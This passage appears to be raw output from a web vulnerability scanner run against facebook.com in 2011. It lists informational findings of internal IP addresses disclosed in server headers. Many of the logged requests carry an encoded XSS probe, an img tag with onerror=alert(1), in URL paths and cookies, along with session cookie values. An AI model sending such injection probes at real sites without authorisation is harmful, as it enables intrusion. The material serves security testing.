Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; wd=1022x1007

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.96.57
X-Cnection: close
Date: Thu, 05 May 2011 11:56:38 GMT
Content-Length: 11260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.8. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.43.102.67

Request

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.102.67
X-Cnection: close
Date: Thu, 05 May 2011 11:56:26 GMT
Content-Length: 11478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.9. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.145.67

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.10. http://www.facebook.com/AOLrealestate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /AOLrealestate

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.181.29

Request

GET /AOLrealestate HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.29
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 37726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.11. http://www.facebook.com/BPAmerica

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BPAmerica

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.155.55

Request

GET /BPAmerica HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.55
Connection: close
Date: Thu, 05 May 2011 11:42:32 GMT
Content-Length: 183008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.12. http://www.facebook.com/BPAmerica

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BPAmerica

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.32.217.127

Request

GET /BPAmerica HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.217.127
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 183008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.13. http://www.facebook.com/BPAmerica

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BPAmerica

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.105.31

Request

GET /BPAmerica?v=app_116299338448715 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.31
Connection: close
Date: Thu, 05 May 2011 11:42:32 GMT
Content-Length: 36234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.14. http://www.facebook.com/DailyFinance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /DailyFinance

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.168.69

Request

GET /DailyFinance HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.69
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 197840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.15. http://www.facebook.com/HockeyKen

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HockeyKen

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.195.39

Request

GET /HockeyKen HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.16. http://www.facebook.com/KickIceForever

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /KickIceForever

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.194.43

Request

GET /KickIceForever HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.17. http://www.facebook.com/LadyBonesie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /LadyBonesie

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.167.61

Request

GET /LadyBonesie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.167.61
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 14829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.18. http://www.facebook.com/Loizza

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Loizza

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.190.69

Request

GET /Loizza HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.19. http://www.facebook.com/aim

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aim

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.155.37

Request

GET /aim HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.37
Connection: close
Date: Thu, 05 May 2011 11:40:16 GMT
Content-Length: 170476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.20. http://www.facebook.com/ajax/connect/feedback.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/feedback.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.168.73

Request

GET /ajax/connect/feedback.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.73
Connection: close
Date: Thu, 05 May 2011 11:42:15 GMT
Content-Length: 0


20.21. http://www.facebook.com/ajax/connect/vote.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/vote.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.146.29

Request

GET /ajax/connect/vote.php?url=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&id=fbc_10150174862354920_16359088_10150175101634920&show_all_replies=0&owns_pages=0&in_moderation_queue=0&view_as_moderator=0&controller_id=feedback_0ikA9CVHuJf7JTFou&in_contextual_dialog=0&in_aggregated_view=0&vote=spam HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.29
Connection: close
Date: Thu, 05 May 2011 11:42:15 GMT
Content-Length: 0


20.22. http://www.facebook.com/ajax/connect/vote.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/vote.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.187.33

Request

GET /ajax/connect/vote.php?show_all_replies=0&url=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&id=fbc_10150174862354920_16359088_10150175101634920&in_moderation_queue=0&view_as_moderator=0&in_aggregated_view=0&in_contextual_dialog=0&controller_id=feedback_0ikA9CVHuJf7JTFou&owns_pages=0&vote=up HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
